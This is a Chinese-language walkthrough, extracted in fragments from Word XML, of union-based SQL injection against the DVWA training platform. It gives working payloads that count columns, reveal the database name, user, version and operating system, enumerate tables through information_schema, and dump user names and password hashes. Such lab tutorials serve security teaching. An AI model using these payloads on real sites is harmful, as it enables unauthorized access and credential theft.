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Sql 注入.猜解数据库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使用DVWA渗透测试平台，作为攻击测试的目标：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58105" cy="2265045"/>
            <wp:effectExtent l="0" t="0" r="4445" b="190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先输入 1 ，查看回显 (URL中ID=1，说明php页面通过get方法传递参数)：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92955" cy="2181860"/>
            <wp:effectExtent l="0" t="0" r="17145" b="889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点击 </w:t>
      </w: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view source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查看源代码 ，其中的SQL查询代码为：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772400" cy="1905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可以看到，实际执行的Sql语句是：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first_name,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last_name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users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WHERE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user_id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通过控制参数Id的值来返回需要的信息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在输入框中输入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1' order by 1#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实际执行的Sql语句就会变成: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first_name,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last_name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users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WHERE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user_id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'1'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order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by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#`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;(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按照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Mysql语法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，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后面会被注释掉，使用这种方法屏蔽掉后面的单引号，避免语法错误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这条语句的意思是查询users表中user_id为1的数据并按第一字段排行。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输入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1' order by 1#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和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1' order by 2#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时都返回正常：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9775" cy="1218565"/>
            <wp:effectExtent l="0" t="0" r="9525" b="63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1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72125" cy="1169670"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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当输入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1' order by 3#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时，返回错误：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81550" cy="950595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905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users表中只有两个字段，数据为两列。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使用 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union select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联合查询继续获取信息。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 xml:space="preserve">union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示，即执行联合查询。需要注意在使用 union 查询的时候需要和主查询的列数相同，而之前已经知道了主查询列数为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输入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1' union select database(),user()#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进行查询 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- database()将会返回当前网站所使用的数据库名字.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- user()将会返回执行当前查询的用户名.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实际执行的Sql语句是 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SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user()#`;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3525" cy="1581785"/>
            <wp:effectExtent l="0" t="0" r="9525" b="18415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通过上图返回信息成功获取到：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- 当前网站使用数据库为 dvwa .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- 当前执行查询用户名为 root@localhost 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再输入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1' union select version(),@@version_compile_os#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进行查询：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- version() 获取当前数据库版本.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- @@version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>compile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os 获取当前操作系统。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实际执行的Sql语句是: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SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;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0700" cy="1672590"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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7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通过上图返回信息成功获取到：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- 当前数据库版本为 : 5.6.31-0ubuntu0.15.10.1.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- 当前操作系统为 : debian-linux-gnu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获取 dvwa 数据库中的表名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information_schema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 是 mysql 自带的一张表，这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名，数据库的表，表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表，该表包含两个字段 table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>name 和 table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schema，分别记录 DBMS 中的存储的表名和表名所在的数据库。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输入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1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#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进行查询：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实际执行的Sql语句是：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SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`;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6425" cy="1682750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="12700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通过上图返回信息获取到：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- dvwa 数据库有两个数据表，分别是 guestbook 和 users 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猜测users表的字段为 user 和 password ，所以输入：</w:t>
      </w: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1' union select user,password from users#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进行查询：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实际执行的 Sql 语句是：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SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;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0885" cy="3748405"/>
            <wp:effectExtent l="0" t="0" r="18415" b="4445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3748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F7162"/>
    <w:rsid w:val="3F1F71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2019-07-04T03:51:00Z</dcterms:created>
  <dc:creator>小丑</dc:creator>
  <cp:lastModifiedBy>小丑</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-04T03:59:19Z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